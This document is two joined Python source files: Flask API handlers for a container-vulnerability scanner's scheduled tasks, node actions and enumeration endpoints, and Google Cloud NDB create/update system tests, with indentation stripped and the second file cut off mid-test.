merged_filters = response.get('filters')
else:
merged_filters = resource_filters
filter_index = {}
for resource_filter in merged_filters:
if resource_filter.get('name') in filter_index:
existing_resource_filter = filter_index[resource_filter.get('name')]
existing_options = set(existing_resource_filter.get('options'))
current_options = set(resource_filter.get('options'))
new_options = current_options - existing_options
updated_options = existing_resource_filter.get('options') + list(new_options)
existing_resource_filter['options'] = updated_options
else:
filter_index[resource_filter.get('name')] = resource_filter
all_filters = [value for value in filter_index.values()]
all_filters.sort(key=lambda x: x.get('name'))
return set_response(data={'filters': all_filters})
@resource_api.route("/scheduled_tasks", methods=["GET"], endpoint="api_v1_5_scheduled_tasks_list")
@jwt_required
def list_scheduled_tasks():
"""
Scheduled Tasks API
---
tags:
- Scheduled Tasks
security:
- Bearer: []
operationId: getScheduledTasks
description: Get list of all scheduled tasks
responses:
200:
description: Request success
properties:
data:
type: string
description: Response message
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
scheduled_tasks = Scheduler.query.order_by(Scheduler.created_at.asc()).all()
if not scheduled_tasks:
scheduled_tasks = []
response = {"scheduled_tasks": [{
"id": task.id, "created_at": str(task.created_at), "action": task.action, "description": task.description,
"cron": task.cron_expr, "status": task.status, "last_ran_at": str(task.last_ran_at),
"node_names": task.node_names, "is_enabled": task.is_enabled, "node_type": task.nodes.get("node_type", "")
} for task in scheduled_tasks]}
return set_response(data=response)
@resource_api.route("/scheduled_tasks/update", methods=["POST"], endpoint="api_v1_5_scheduled_tasks_update")
@jwt_required
@non_read_only_user
def update_scheduled_tasks():
"""
Scheduled Tasks API
---
tags:
- Scheduled Tasks
security:
- Bearer: []
operationId: updateScheduledTasks
description: Enable, disable or delete scheduled tasks
parameters:
- in: body
name: Options
description: Options to enable, disable or delete scheduled tasks
schema:
type: object
properties:
action:
type: string
enum: [enable, disable, delete]
description: Action to perform - `enable`, `disable` or `delete`
scheduled_task_id_list:
type: array
uniqueItems: true
required: true
description: List of scheduled task ids
example: [1,3,5]
items:
type: integer
responses:
201:
description: Updated successfully.
400:
description: Bad request.
"""
if not request.is_json:
raise InvalidUsage("Missing JSON post data in request")
if type(request.json) != dict:
raise InvalidUsage("Request data invalid")
action = request.json.get("action", "enable")
if action not in ["enable", "disable", "delete"]:
raise InvalidUsage("action must be enable, disable or delete")
scheduled_task_id_list = request.json.get("scheduled_task_id_list")
if not scheduled_task_id_list:
raise InvalidUsage("scheduled_task_id_list is required")
if type(scheduled_task_id_list) != list:
raise InvalidUsage("scheduled_task_id_list must be list")
if action == "delete":
Scheduler.bulk_delete_schedules(Scheduler.query.filter(Scheduler.id.in_(scheduled_task_id_list)))
else:
is_enabled = True
if action == "disable":
is_enabled = False
Scheduler.bulk_update_schedules(Scheduler.query.filter(Scheduler.id.in_(scheduled_task_id_list)), is_enabled)
return set_response(status=201)
@resource_api.route("/node_action", methods=["POST"], endpoint="api_v1_5_node_action")
@jwt_required
def node_action():
"""
Node Action API
---
tags:
- Node Action
security:
- Bearer: []
operationId: nodeAction
description: Start or schedule scan, get reports, etc for a set of nodes
parameters:
- in: body
name: Options
description: Options to enumerate nodes
schema:
type: object
properties:
node_type:
type: string
required: true
description: Node type
enum: [host, container, container_image, registry_image, container_by_name, process, process_by_name, pod, kube_controller, kube_service, swarm_service]
action:
type: string
required: true
description: Node type
enum: [cve_scan_start, cve_scan_status, schedule_vulnerability_scan, download_report, send_report]
responses:
200:
description: Request success
properties:
data:
type: object
description: Response message
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
if not request.is_json:
raise InvalidUsage("Missing JSON post data in request")
post_data = request.json
if not post_data:
raise InvalidUsage("Missing JSON post data in request")
node_type = post_data.get("node_type", None)
if node_type not in constants.NODE_BULK_ACTIONS:
raise InvalidUsage("node_type {0} not supported".format(node_type))
action = post_data.get("action", None)
if action not in constants.NODE_BULK_ACTIONS[node_type]:
raise InvalidUsage("action {0} not supported for node_type {1}".format(action, node_type))
current_user = get_jwt_identity()
user = User.query.filter_by(id=current_user["id"]).one_or_none()
if action != constants.NODE_ACTION_DOWNLOAD_REPORT:
if user.role.name not in [constants.USER_ROLES.ADMIN_USER, constants.USER_ROLES.NORMAL_USER]:
raise Forbidden("User not permitted to perform this action")
node_ids = post_data.get("node_id_list", [])
if type(node_ids) != list:
node_ids = []
registry_images = post_data.get("registry_images", {})
if type(registry_images) != dict:
registry_images = {}
from config.redisconfig import redis
df_id_to_scope_id_map = {}
topology_data_df_format = {}
include_dead_nodes = bool(post_data.get("include_dead_nodes", False))
node_action_details = {"node_type": node_type, "include_dead_nodes": include_dead_nodes,
"file_type": post_data.get("file_type", "xlsx")}
action_args = post_data.get("action_args", {})
if action_args and type(action_args) != dict:
raise InvalidUsage("action_args should be in json format")
if not action_args:
action_args = {}
accepted_action_args = ["cron", "description", "scan_type", "filters", "resources",
"report_email", "duration", "registry_credentials", "delete_resources"]
action_args = {k: v for k, v in action_args.items() if k in accepted_action_args}
filters = action_args.get("filters", {})
if type(filters) != dict:
raise InvalidUsage("action_args.filters must be a json")
if filters:
node_action_details["filters"] = filters
# "filters", "resources", "report_email" - for download report / send report
# resources - [{"type":"cve","filter":{"cve_severity":["critical"]}}]
report_resources = action_args.get("resources", [])
if type(report_resources) != list:
raise InvalidUsage("action_args.resources must be list")
if report_resources:
node_action_details["resources"] = report_resources
report_email = action_args.get("report_email", "")
if report_email:
node_action_details["report_email"] = str(report_email)
report_duration = action_args.get('duration', {})
if report_duration and type(report_duration) != dict:
raise InvalidUsage("action_args.duration must be json")
if report_duration:
duration_number = report_duration.get('number')
duration_time_unit = report_duration.get('time_unit')
if duration_number:
try:
duration_number = int(duration_number)
except ValueError:
raise InvalidUsage("Number should be an integer value.")
if duration_time_unit and duration_time_unit not in constants.TIME_UNIT_MAPPING.keys():
raise InvalidUsage("time_unit should be one of these, month/day/hour/minute")
node_action_details["duration"] = {"number": duration_number,
"time_unit": constants.TIME_UNIT_MAPPING.get(duration_time_unit)}
if node_type == constants.NODE_TYPE_REGISTRY_IMAGE:
if not registry_images:
raise InvalidUsage("registry_images is required for node_type registry_image")
if not registry_images.get("registry_id") or type(registry_images["registry_id"]) != int:
raise InvalidUsage("registry_id is required in registry_images key")
if not filters and not registry_images.get("image_name_with_tag_list"):
raise InvalidUsage("image_name_with_tag_list is required in registry_images key")
if registry_images.get("image_name_with_tag_list") and type(
registry_images["image_name_with_tag_list"]) != list:
raise InvalidUsage("image_name_with_tag_list must be a list")
for img in registry_images["image_name_with_tag_list"]:
if not img:
raise InvalidUsage("image_name_with_tag_list must not have empty values")
try:
RegistryCredential.query.get(registry_images["registry_id"])
except:
raise InternalError("Failed to get registry credential {}".format(registry_images["registry_id"]))
node_action_details["registry_images"] = registry_images
else:
if not filters and not node_ids:
raise InvalidUsage("node_id_list is required for node_type {0}".format(node_type))
redis_pipe = redis.pipeline()
redis_pipe.hgetall(constants.DF_ID_TO_SCOPE_ID_REDIS_KEY_PREFIX + node_type.upper())
redis_pipe.get(websocketio_channel_name_format(node_type + "?format=deepfence")[1])
redis_resp = redis_pipe.execute()
df_id_to_scope_id_map = redis_resp[0]
if redis_resp[1]:
topology_data_df_format = json.loads(redis_resp[1])
# Temporarily accept scope_id
node_utils = NodeUtils()
node_ids = [node_utils.get_df_id_from_scope_id(scope_id, node_type) for scope_id in node_ids]
node_action_details["node_id_list"] = node_ids
if action in [constants.NODE_ACTION_CVE_SCAN_START, constants.NODE_ACTION_SCHEDULE_CVE_SCAN]:
if node_type not in [constants.NODE_TYPE_HOST, constants.NODE_TYPE_CONTAINER,
constants.NODE_TYPE_CONTAINER_IMAGE, constants.NODE_TYPE_REGISTRY_IMAGE]:
raise InvalidUsage("action {0} not applicable for node_type {1}".format(action, node_type))
scan_types = action_args.get("scan_type", None)
if not scan_types or type(scan_types) != list:
raise InvalidUsage("scan_type is required and it should be list")
if "base" not in scan_types:
scan_types.append("base")
invalid_scan_types = set(scan_types) - set(constants.CVE_SCAN_TYPES)
if invalid_scan_types:
raise InvalidUsage("scan_type has invalid values: {0}".format(", ".join(invalid_scan_types)))
node_action_details["scan_type"] = scan_types
elif action == constants.NODE_ACTION_CVE_SCAN_STOP:
if node_type not in [constants.NODE_TYPE_HOST, constants.NODE_TYPE_CONTAINER,
constants.NODE_TYPE_CONTAINER_IMAGE, constants.NODE_TYPE_REGISTRY_IMAGE]:
raise InvalidUsage("action {0} not applicable for node_type {1}".format(action, node_type))
elif action in [constants.NODE_ACTION_DOWNLOAD_REPORT, constants.NODE_ACTION_SCHEDULE_SEND_REPORT]:
if not filters:
raise InvalidUsage("filters is required for this action")
if not report_resources:
raise InvalidUsage("resources is required for this action")
if action == constants.NODE_ACTION_SCHEDULE_SEND_REPORT and not report_email:
raise InvalidUsage("report_email is required for schedule_send_report action")
node_action_details_user_activity = deepcopy(node_action_details)
if node_type == constants.NODE_TYPE_REGISTRY_IMAGE:
# TODO: get the image names
pass
else:
node_names = []
for node_id in node_ids:
try:
node = Node(node_id, df_id_to_scope_id_map=df_id_to_scope_id_map,
topology_data_df_format=topology_data_df_format)
if node.name:
node_names.append(node.name)
except:
pass
node_action_details_user_activity["node_id_list"] = node_names
from tasks.user_activity import create_user_activity
create_user_activity.delay(current_user["id"], constants.ACTION_BULK, action,
resources=[node_action_details_user_activity], success=True)
if action in [constants.NODE_ACTION_CVE_SCAN_START]:
from config.app import celery_app
celery_app.send_task(
'tasks.common_worker.common_worker', args=(), queue=constants.CELERY_NODE_ACTION_QUEUE,
kwargs={"action": action, "node_action_details": node_action_details, "task_type": "node_task"})
elif action in [constants.NODE_ACTION_DOWNLOAD_REPORT]:
from tasks.task_scheduler import run_node_task
return run_node_task(action, node_action_details)
elif action in [constants.NODE_ACTION_SCHEDULE_CVE_SCAN, constants.NODE_ACTION_SCHEDULE_SEND_REPORT]:
if not action_args.get("cron"):
raise InvalidUsage("cron is required in action_args key")
if not croniter.is_valid(action_args["cron"]):
raise InvalidUsage("cron is invalid")
node_names = ""
if node_type == constants.NODE_TYPE_REGISTRY_IMAGE:
node_names = ", ".join(registry_images["image_name_with_tag_list"][:3])
if len(registry_images["image_name_with_tag_list"]) > 3:
node_names += " and more"
else:
tmp_node_names = []
for node_id in node_ids[:3]:
try:
node = Node(node_id, df_id_to_scope_id_map=df_id_to_scope_id_map,
topology_data_df_format=topology_data_df_format)
tmp_node_names.append(node.name)
except:
pass
node_names = ", ".join(tmp_node_names)
if len(node_ids) > 3:
node_names += " and more"
try:
check_existing = Scheduler.query.filter_by(action=action, nodes=node_action_details).all()
if check_existing:
raise InvalidUsage("A similar schedule already exists")
scheduled_action = Scheduler(
action=action, description=str(action_args.get("description", "")), cron_expr=action_args["cron"],
nodes=node_action_details, is_enabled=True, node_names=node_names, status="")
scheduled_action.save()
except Exception as exc:
return set_response(error="Could not save scheduled task: {}".format(exc), status=400)
return set_response("Ok")
return set_response("Ok")
@resource_api.route("/enumerate", methods=["POST"], endpoint="api_v1_5_enumerate")
@jwt_required
def enumerate_node():
"""
Enumerate API
---
tags:
- Enumerate
security:
- Bearer: []
operationId: enumerateNodes
description: Enumerate nodes (hosts, containers, images, processes) with optional filters
parameters:
- in: body
name: Options
description: Options to enumerate nodes
schema:
type: object
properties:
size:
type: integer
default: 10
minimum: 1
maximum: 100000
example: 10
description: The numbers of vulnerabilities to return
sort_by:
type: string
example: name
description: Field to sort by
sort_order:
type: string
example: asc
enum: [asc, desc]
description: Sort order
fields:
type: array
example: ["name"]
description: Respond only selected fields
start_index:
type: integer
minimum: 0
maximum: 99999
example: 0
default: 0
description: The number of items to skip before starting to collect the result set
filters:
description: Filter vulnerabilities by various fields (key value pairs)
type: object
properties:
type:
type: array
uniqueItems: true
description: Types of node
example: ["host"]
items:
type: string
enum: [host, container, container_image, container_by_name, process, process_by_name, pod, kube_controller, kube_service, swarm_service]
pseudo:
type: array
uniqueItems: true
description: Pseudo node or not
example: [false]
items:
type: boolean
enum: [true, false]
kernel_version:
type: array
uniqueItems: true
description: Kernel version (for type `host`)
example: ["4.13.0-1019-gcp #23-Ubuntu SMP Thu May 31 16:13:34 UTC 2018"]
items:
type: string
host_name:
type: array
uniqueItems: true
description: Host names
example: ["dev-1", "dev-2"]
items:
type: string
os:
type: array
uniqueItems: true
description: Operating system (for type `host`)
example: ["linux"]
items:
type: string
local_networks:
type: array
uniqueItems: true
description: Local networks in CIDR format (for type `host`)
example: ["127.0.0.1/8", "172.17.0.1/16"]
items:
type: string
interfaceNames:
type: array
uniqueItems: true
description: Interface names (for type `host`)
example: ["lo", "docker0", "eth0"]
items:
type: string
publicIpAddress:
type: array
uniqueItems: true
description: Public IP of host (for type `host`)
example: ["1.2.3.4"]
items:
type: string
kubernetes_node_type:
type: array
uniqueItems: true
description: kubernetes node type (for type `kube_controller`)
example: ["running"]
items:
type: string
enum: [Deployment, DaemonSet, ReplicaSet, CronJob, StatefulSet]
kubernetes_namespace:
type: array
uniqueItems: true
description: kubernetes namespace (for type `pod`, `kube_controller`, `kube_service`). Empty means all.
example: ["default"]
items:
type: string
enum: [default, "", kube-public, kube-system]
tags:
type: array
uniqueItems: true
description: User defined tags
example: ["prod"]
items:
type: string
container_name:
type: array
uniqueItems: true
description: Container name (for type `container`, `container_image`)
example: ["redis", "mysql"]
items:
type: string
image_name:
type: array
uniqueItems: true
description: Container image names (for type `container`, `container_image`)
example: ["redis:latest", "mysql:latest"]
items:
type: string
pid:
type: integer
minimum: 1
description: Process ID (for type `process`)
example: 1225
ppid:
type: integer
minimum: 1
description: Parent process ID (for type `process`)
example: 1225
responses:
200:
description: Request success
properties:
data:
type: object
description: Response message
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
try:
if not request.is_json:
raise InvalidUsage("Missing JSON post data in request")
post_data = request.json
if not post_data:
post_data = {}
return set_response(data=resource.get_enumerate_node_data(post_data))
except Exception as ex:
raise InternalError(str(ex))
@resource_api.route("/status", methods=["POST"], endpoint="api_v1_5_status_api")
@jwt_required
def status_api():
"""
Status API
---
tags:
- Enumerate
security:
- Bearer: []
operationId: statusApi
description: Get status of a previous request by status_id
parameters:
- in: body
name: Options
description: Options
schema:
type: object
properties:
id:
type: string
description: Status ID which was sent in previous request. If a particular request takes longer, api call will reply a status id. This id should be used to query the status of that particular request. It status is success, it will respond data url where data will be available.
required: true
example: "qwkfjwqfkwqkf"
responses:
200:
description: Request success
properties:
data:
type: object
description: Response message
properties:
data_url:
type: string
description: Data API url path
id:
type: string
description: id to use when calling data api
status:
type: string
description: If status is `success`, then data is available
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
try:
if not request.is_json:
raise InvalidUsage("Missing JSON in request")
if type(request.json) != dict:
raise InvalidUsage("Request data invalid")
status_id_encoded = request.json.get("id", None)
if not status_id_encoded:
raise InvalidUsage("id is required.")
status_id = json.loads(resource.decrypt(status_id_encoded))
status = getattr(resource, status_id["type"] + "_status")(status_id["params"], status_id["post_data"])
response = {
"id": status_id_encoded,
"status": status
}
if status == "success":
response["data_url"] = "{0}/data".format(constants.API_URL_PREFIX)
return set_response(data=response)
except Exception as ex:
raise InternalError(str(ex))
@resource_api.route("/data", methods=["POST"], endpoint="api_v1_5_data_api")
@jwt_required
def data_api():
"""
Data API
---
tags:
- Enumerate
security:
- Bearer: []
operationId: dataApi
description: Get data of a previous request by status_id
parameters:
- in: body
name: Options
description: Options
schema:
type: object
properties:
id:
type: string
description: Status ID which was sent in previous status api. If a particular request takes longer, api call will reply a status id. This id should be used to query the status of that particular request. It status is success, it will respond data url where data will be available.
required: true
example: "qwkfjwqfkwqkf"
responses:
200:
description: Request success
properties:
data:
type: object
description: Response data
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
try:
if not request.is_json:
raise InvalidUsage("Missing JSON in request")
if type(request.json) != dict:
raise InvalidUsage("Request data invalid")
data_id_encoded = request.json.get("id", None)
if not data_id_encoded:
raise InvalidUsage("id is required.")
status_id = json.loads(resource.decrypt(data_id_encoded))
data = getattr(resource, status_id["type"] + "_data")(status_id["params"], status_id["post_data"])
response = {
"id": data_id_encoded,
"data": data,
}
return set_response(data=response)
except Exception as ex:
raise InternalError(str(ex))
|
test_crud.py
|
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
System tests for Create, Update, Delete. (CRUD)
"""
import datetime
import functools
import operator
import os
import threading
import zlib
try:
from unittest import mock
except ImportError:
import mock
import pytest
import test_utils.system
from google.cloud import ndb
from google.cloud.ndb import _cache
from google.cloud.ndb import global_cache as global_cache_module
from tests.system import KIND, eventually
USE_REDIS_CACHE = bool(os.environ.get("REDIS_CACHE_URL"))
def _equals(n):
return functools.partial(operator.eq, n)
@pytest.mark.usefixtures("client_context")
def test_retrieve_entity(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none", baz=b"night")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
key = ndb.Key(KIND, entity_id)
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
def test_retrieve_entity_with_caching(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none", baz=b"night")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
client_context.set_cache_policy(None) # Use default
key = ndb.Key(KIND, entity_id)
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
assert key.get() is entity
def test_retrieve_entity_with_global_cache(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none", baz=b"night")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
global_cache = global_cache_module._InProcessGlobalCache()
cache_dict = global_cache_module._InProcessGlobalCache.cache
with client_context.new(global_cache=global_cache).use() as context:
context.set_global_cache_policy(None) # Use default
key = ndb.Key(KIND, entity_id)
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
cache_key = _cache.global_cache_key(key._key)
assert cache_key in cache_dict
patch = mock.patch("google.cloud.ndb._datastore_api._LookupBatch.add")
patch.side_effect = Exception("Shouldn't call this")
with patch:
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
@pytest.mark.skipif(not USE_REDIS_CACHE, reason="Redis is not configured")
def test_retrieve_entity_with_redis_cache(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none", baz=b"night")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
global_cache = global_cache_module.RedisCache.from_environment()
with client_context.new(global_cache=global_cache).use() as context:
context.set_global_cache_policy(None) # Use default
key = ndb.Key(KIND, entity_id)
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
cache_key = _cache.global_cache_key(key._key)
assert global_cache.redis.get(cache_key) is not None
patch = mock.patch("google.cloud.ndb._datastore_api._LookupBatch.add")
patch.side_effect = Exception("Shouldn't call this")
with patch:
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
@pytest.mark.usefixtures("client_context")
def test_retrieve_entity_not_found(ds_entity):
entity_id = test_utils.system.unique_resource_id()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
key = ndb.Key(KIND, entity_id)
assert key.get() is None
@pytest.mark.usefixtures("client_context")
def test_nested_tasklet(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
@ndb.tasklet
def get_foo(key):
entity = yield key.get_async()
raise ndb.Return(entity.foo)
key = ndb.Key(KIND, entity_id)
assert get_foo(key).result() == 42
@pytest.mark.usefixtures("client_context")
def test_retrieve_two_entities_in_parallel(ds_entity):
entity1_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity1_id, foo=42, bar="none")
entity2_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity2_id, foo=65, bar="naan")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
key1 = ndb.Key(KIND, entity1_id)
key2 = ndb.Key(KIND, entity2_id)
@ndb.tasklet
def get_two_entities():
entity1, entity2 = yield key1.get_async(), key2.get_async()
raise ndb.Return(entity1, entity2)
entity1, entity2 = get_two_entities().result()
assert isinstance(entity1, SomeKind)
assert entity1.foo == 42
assert entity1.bar == "none"
assert isinstance(entity2, SomeKind)
assert entity2.foo == 65
assert entity2.bar == "naan"
@pytest.mark.usefixtures("client_context")
def test_insert_entity(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
entity = SomeKind(foo=42, bar="none")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
# Make sure strings are stored as strings in datastore
ds_entity = ds_client.get(key._key)
assert ds_entity["bar"] == "none"
@pytest.mark.usefixtures("client_context")
def test_insert_entity_with_stored_name_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.StringProperty()
bar = ndb.StringProperty(name="notbar")
entity = SomeKind(foo="something", bar="or other")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == "something"
assert retrieved.bar == "or other"
ds_entity = ds_client.get(key._key)
assert ds_entity["notbar"] == "or other"
@pytest.mark.usefixtures("client_context")
def test_insert_roundtrip_naive_datetime(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.DateTimeProperty()
entity = SomeKind(foo=datetime.datetime(2010, 5, 12, 2, 42))
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == datetime.datetime(2010, 5, 12, 2, 42)
@pytest.mark.usefixtures("client_context")
def test_datetime_w_tzinfo(dispose_of, ds_client):
class timezone(datetime.tzinfo):
def __init__(self, offset):
self.offset = datetime.timedelta(hours=offset)
def utcoffset(self, dt):
return self.offset
def dst(self, dt):
return datetime.timedelta(0)
mytz = timezone(-4)
class SomeKind(ndb.Model):
foo = ndb.DateTimeProperty(tzinfo=mytz)
bar = ndb.DateTimeProperty(tzinfo=mytz)
entity = SomeKind(
foo=datetime.datetime(2010, 5, 12, 2, 42, tzinfo=timezone(-5)),
bar=datetime.datetime(2010, 5, 12, 2, 42),
)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == datetime.datetime(2010, 5, 12, 3, 42, tzinfo=mytz)
assert retrieved.bar == datetime.datetime(2010, 5, 11, 22, 42, tzinfo=mytz)
def test_parallel_threads(dispose_of, namespace):
client = ndb.Client(namespace=namespace)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
def insert(foo):
with client.context(cache_policy=False):
entity = SomeKind(foo=foo, bar="none")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
assert retrieved.bar == "none"
thread1 = threading.Thread(target=insert, args=[42], name="one")
thread2 = threading.Thread(target=insert, args=[144], name="two")
thread1.start()
thread2.start()
thread1.join()
thread2.join()
@pytest.mark.usefixtures("client_context")
def test_large_json_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.JsonProperty()
foo = {str(i): i for i in range(500)}
entity = SomeKind(foo=foo)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
@pytest.mark.usefixtures("client_context")
def test_compressed_json_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.JsonProperty(compressed=True)
foo = {str(i): i for i in range(500)}
entity = SomeKind(foo=foo)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
@pytest.mark.usefixtures("client_context")
def test_compressed_blob_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.BlobProperty(compressed=True)
foo = b"abc" * 100
entity = SomeKind(foo=foo)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
@pytest.mark.usefixtures("client_context")
def test_retrieve_entity_with_legacy_compressed_property(
ds_entity_with_meanings,
):
class SomeKind(ndb.Model):
blob = ndb.BlobProperty()
value = b"abc" * 1000
compressed_value = zlib.compress(value)
entity_id = test_utils.system.unique_resource_id()
ds_entity_with_meanings(
{"blob": (22, compressed_value)},
KIND,
entity_id,
**{"blob": compressed_value}
)
key = ndb.Key(KIND, entity_id)
retrieved = key.get()
assert retrieved.blob == value
@pytest.mark.usefixtures("client_context")
def test_large_pickle_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.PickleProperty()
foo = {str(i): i for i in range(500)}
entity = SomeKind(foo=foo)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
@pytest.mark.usefixtures("client_context")
def test_key_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.KeyProperty()
key_value = ndb.Key("Whatevs", 123)
entity = SomeKind(foo=key_value)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == key_value
@pytest.mark.usefixtures("client_context")
def test_multiple_key_properties(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.KeyProperty(kind="Whatevs")
bar = ndb.KeyProperty(kind="Whatevs")
foo = ndb.Key("Whatevs", 123)
bar = ndb.Key("Whatevs", 321)
entity = SomeKind(foo=foo, bar=bar)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
assert retrieved.bar == bar
assert retrieved.foo != retrieved.bar
def test_insert_entity_with_caching(client_context):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
client_context.set_cache_policy(None) # Use default
entity = SomeKind(foo=42, bar="none")
key = entity.put()
with client_context.new(cache_policy=False).use():
# Sneaky. Delete entity out from under cache so we know we're getting
# cached copy.
key.delete()
eventually(key.get, _equals(None))
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
def test_insert_entity_with_global_cache(dispose_of, client_context):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
global_cache = global_cache_module._InProcessGlobalCache()
cache_dict = global_cache_module._InProcessGlobalCache.cache
with client_context.new(global_cache=global_cache).use() as context:
context.set_global_cache_policy(None) # Use default
entity = SomeKind(foo=42, bar="none")
key = entity.put()
dispose_of(key._key)
cache_key = _cache.global_cache_key(key._key)
assert not cache_dict
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
assert cache_key in cache_dict
entity.foo = 43
entity.put()
# This is py27 behavior. I can see a case being made for caching the
# entity on write rather than waiting for a subsequent lookup.
assert cache_key not in cache_dict
@pytest.mark.skipif(not USE_REDIS_CACHE, reason="Redis is not configured")
def test_insert_entity_with_redis_cache(dispose_of, client_context):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
global_cache = global_cache_module.RedisCache.from_environment()
with client_context.new(global_cache=global_cache).use() as context:
context.set_global_cache_policy(None) # Use default
entity = SomeKind(foo=42, bar="none")
key = entity.put()
dispose_of(key._key)
cache_key = _cache.global_cache_key(key._key)
assert global_cache.redis.get(cache_key) is None
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
assert global_cache.redis.get(cache_key) is not None
entity.foo = 43
entity.put()
# This is py27 behavior. I can see a case being made for caching the
# entity on write rather than waiting for a subsequent lookup.
assert global_cache.redis.get(cache_key) is None
@pytest.mark.usefixtures("client_context")
def test_update_entity(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
key = ndb.Key(KIND, entity_id)
entity = key.get()
entity.foo = 56
entity.bar = "high"
assert entity.put() == key
retrieved = key.get()
assert retrieved.foo == 56
assert retrieved.bar == "high"
@pytest.mark.usefixtures("client_context")
def test_insert_entity_in_transaction(dispose_of):
commit_callback = mock.Mock()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
def save_entity():
ndb.get_context().call_on_commit(commit_callback)
entity = SomeKind(foo=42, bar="none")
key = entity.put()
dispose_of(key._key)
return key
key = ndb.transaction(save_entity)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
commit_callback.assert_called_once_with()
@pytest.mark.usefixtures("client_context")
def test_update_entity_in_transaction(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none")
